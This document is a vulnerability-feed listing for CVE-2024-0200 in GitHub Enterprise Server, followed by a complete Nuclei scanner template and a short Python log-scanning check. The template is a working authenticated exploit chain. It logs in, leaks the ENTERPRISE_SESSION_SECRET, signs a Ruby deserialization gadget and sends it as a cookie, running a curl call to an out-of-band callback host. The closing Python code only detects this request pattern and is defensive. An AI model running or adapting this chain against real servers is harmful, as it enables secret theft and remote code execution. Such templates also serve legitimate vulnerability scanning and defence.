| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Unsafe Reflection in Github Enterprise_Server | 18 Mar 2024 03:19 | – | githubexploit |
| The vulnerability of the corporate version of the GitHub Enterprise Server, related to the use of external management input for class selection, allows a perpetrator to execute arbitrary code. | 24 Jan 2024 00:00 | – | bdu_fstec |
| CVE-2024-0200 | 17 Jan 2024 08:44 | – | circl |
| GitHub Enterprise Server Security Vulnerability | 16 Jan 2024 00:00 | – | cnnvd |
| CVE-2024-0200 | 16 Jan 2024 18:50 | – | cve |
| CVE-2024-0200 Unsafe Reflection in Github Enterprise Server leading to Command Injection | 16 Jan 2024 18:50 | – | cvelist |
| CVE-2024-0200 | 16 Jan 2024 19:15 | – | nvd |
| CVE-2024-0200 | 16 Jan 2024 19:15 | – | osv |
| Design/Logic Flaw | 16 Jan 2024 19:15 | – | prion |
| PT-2023-8397 · Github · Github Enterprise Server | 26 Dec 2023 00:00 | – | ptsecurity |

```yaml
id: CVE-2024-0200

info:
  name: Github Enterprise Authenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
  impact: |
    Authenticated attackers with organization owner privileges can exploit unsafe reflection to execute arbitrary code remotely, leading to complete compromise of the GitHub Enterprise Server instance and potential access to all repositories and data.
  remediation: |
    Upgrade to GitHub Enterprise Server version 3.8.13, 3.9.8, 3.10.5, or 3.11.3 or later.
  reference:
    - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
    - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
    - https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5
    - https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3
    - https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0200
    cwe-id: CWE-470
    epss-score: 0.71725
    epss-percentile: 0.99343
    cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: github
    product: "enterprise_server"
    shodan-query:
      - "title:\"GitHub Enterprise\""
      - micro focus dsd
    fofa-query: "app=\"Github-Enterprise\""
  tags: cve,cve2024,rce,github,enterprise,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  oast: "curl {{interactsh-url}}/?"
  padstr: "{{randstr}}"
  payload: "{{padding(oast,padstr,300,'suffix')}}"
  marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
  b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
  digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
  final_payoad: "{{ b64_marshal_data + '--' + digest}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v3/user/orgs"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    extractors:
      - type: json
        part: body
        name: org_name
        internal: true
        json:
          - ".[].login"

  - method: GET
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"role": "admin"'
        part: body

  - method: POST
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
    headers:
      Content-Type: application/json
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    body: |
      {
        "name": "{{randstr}}"
      }
    matchers:
      - type: status
        status:
          - 201

  - method: GET
    cookie-reuse: true
    path:
      - "{{BaseURL}}/login"
    extractors:
      - type: regex
        part: body
        internal: true
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'
        name: csrf_token

  - method: POST
    path:
      - "{{BaseURL}}/session"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
    matchers:
      - type: status
        status:
          - 302
      - type: word
        words:
          - "_gh_render"
        part: header

  - method: GET
    path:
      - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
    extractors:
      - type: regex
        group: 1
        name: ghe_secret
        internal: true
        regex:
          - '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
        part: body
    matchers:
      - type: word
        words:
          - 'ENTERPRISE_SESSION_SECRET'
        part: body

  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      Cookie: _gh_render={{final_payoad}}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100ae69144548eb7d746bd251f849afde1d662a6fc5f08a34d8a0549c330214f8620221009d21c1c8f4a76207e29da7d4f72b7b168b814de185ab5642141d2570f99d1092:922c64590222798bb761d5b6d8e72950
```
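
A defender-side check for the request pattern this template sends, added here as an example (it is not part of the template or of any GitHub tooling): it scans web access logs for the `rid_key=nw_fsck` request to the Actions `repository_items` settings page and records whether the same client then received a 500 on `/`. The combined log format, the sample lines and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; combined log format is an assumption.
SAMPLE_LOG = '''\
203.0.113.7 - - [16/Jan/2024:10:00:01 +0000] "GET /login HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jan/2024:10:00:02 +0000] "POST /session HTTP/1.1" 302 0
203.0.113.7 - - [16/Jan/2024:10:00:03 +0000] "GET /organizations/acme/settings/actions/repository_items?page=1&rid_key=nw_fsck HTTP/1.1" 200 48211
203.0.113.7 - - [16/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 500 312
198.51.100.9 - - [16/Jan/2024:10:05:00 +0000] "GET /organizations/acme/settings/actions/repository_items?page=2 HTTP/1.1" 200 9000
198.51.100.9 - - [16/Jan/2024:10:05:09 +0000] "GET / HTTP/1.1" 200 7000
'''

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
ITEMS_RE = re.compile(
    r'^/organizations/(?P<org>[^/]+)/settings/actions/repository_items$')
TEMPLATE_RID_KEY = "nw_fsck"  # rid_key value used by the template on this page


def find_template_sequence(log_text):
    """Return one finding per request carrying rid_key=nw_fsck.

    Each finding notes whether the same client later got a 500 on "/",
    which is the response the template's last request matches on.
    """
    findings = []
    pending = {}  # client address -> most recent finding for that client
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        url = urlsplit(m["target"])
        items = ITEMS_RE.match(url.path)
        rid_keys = parse_qs(url.query).get("rid_key", [])
        if items and TEMPLATE_RID_KEY in rid_keys:
            hit = {"client": m["client"], "org": items["org"],
                   "time": m["ts"], "followed_by_500": False}
            findings.append(hit)
            pending[m["client"]] = hit
        elif url.path == "/" and m["status"] == "500" and m["client"] in pending:
            pending[m["client"]]["followed_by_500"] = True
    return findings


if __name__ == "__main__":
    for finding in find_template_sequence(SAMPLE_LOG):
        print(finding)
```

A finding with `followed_by_500` set is worth correlating with outbound DNS or HTTP from the appliance at the same time, since the template's final matcher waits for that callback.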